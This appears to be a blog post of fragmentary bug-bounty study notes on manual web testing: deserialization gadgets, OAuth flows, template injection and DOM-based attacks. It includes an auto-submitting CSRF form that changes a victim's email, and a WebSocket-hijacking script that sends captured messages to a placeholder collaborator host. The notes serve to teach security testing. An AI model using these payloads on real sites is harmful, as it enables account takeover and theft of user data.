Bug Bounty — Manual Approach To Test Vulnerabilities (PART 1 )

Manual testing using Burp Suite
  • PHP — O:4:”User”:2:{s:4:”name”:s:6:”carlos”; s:10:”isLoggedIn”:b:1;}
  • Java — Object begins with “ac ed” (Hex) or “rO0” (Base64)
  • PHP — PHPGCC
    ~ Function calls: exec | system
    ~ ./phpgcc [PAYLAOD] [PARAMETERS] | base64 -w 0 | xclip -selection
    clipboard
    ~ Add encoded payload and secret key (from phpinfo()) to sha1-hmac-generator.php (URL)
  • Java — ysoserial
    ~ Payload should be URL encoded (whole payload) when sending through vulnerable cookie.
  • Reflected input -> no XSS vuln (no output/encoded tags/error message) -> break out using templating syntax (http://vulnerable.com/?greeting=data.username}}<tag>)
  • Common parameters: redirect_uri/response_type/scope/state
GET /authorization?client_id=12345&redirect_uri=https://client-app.com/callback&response_type=code&scope=openid%20profile&state=ae13d489bd00e3c24 HTTP/1.1 Host: oauth-authorization-server.com 
  • Common parameters: code/state
  • Vulnerable to CSRF.
GET /callback?code=a1b2c3d4e5f6g7h8&state=ae13d489bd00e3c24 HTTP/1.1 Host: client-app.com 
  • Common parameters: client_secret/grant_type/client_id/redirect_uri/code
  • Example:
 -> POST /token HTTP/1.1 -> Host: oauth-authorization-server.com   … client_id=12345&client_secret=SECRET&   redirect_uri=https://client-app.com/callback&grant_type=authorization_code&code=a1b2c3d4e5f6g7h8 
  • Note: Try using parameter pollution, SSRF/CORS defense bypass techniques, localhost.evil-server.net, etc.
  • Note: If redirect_uri parameter is sent with code/token, server is likely not vulnerable
<script> 
if (document.location.hash)
{
console.log(“Hash identified — redirecting…”);
window.location = ‘/?’+document.location.hash.substr(1);
}
else
{
console.log(“No hash identified in URL”);
}
</script>
<html> 
<body>
<form action=”https://vulnerable-website.com/email/change” method=”POST”>
<input type=”hidden” name=”email” value=”pwned@evil-user.net” />
</form>
<script>
document.forms[0].submit();
</script>
</body>
</html>
  • Identify design flaws:
  • Cross-Site WebSocket Hijacking (CSWSH):
 <script> 
websocket = new WebSocket(‘wss://your-websocket-URL’)
websocket.onopen = start websocket.onmessage = handleReply
function start(event)
{
websocket.send(“READY”);
}
function handleReply(event)
{
fetch(‘https://your-collaborator-domain/?’+event.data, {mode: ‘no-cors’})
}
</script>
  1. Virtual Hosting (VHosting):
  • Testing for HTTP Host Header Attacks.
  • DOM based XSS
    ~ Common Sources
    ~ Common Sinks
    ~ Testing for Sinks
  • Bypassing CSP Controls

--

--

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store